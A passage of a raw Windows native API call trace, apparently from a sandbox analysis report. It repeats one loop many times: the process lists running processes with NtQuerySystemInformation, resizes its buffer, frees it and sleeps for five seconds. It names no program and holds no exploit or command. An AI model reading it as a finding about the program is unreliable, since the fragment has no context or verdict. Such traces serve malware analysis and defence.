BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.406] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.415] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.424] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.433] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.442] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.450] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.460] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.469] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.478] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.674] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.682] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.691] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.699] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.708] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.718] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.728] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.738] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.746] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.756] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.765] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.774] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 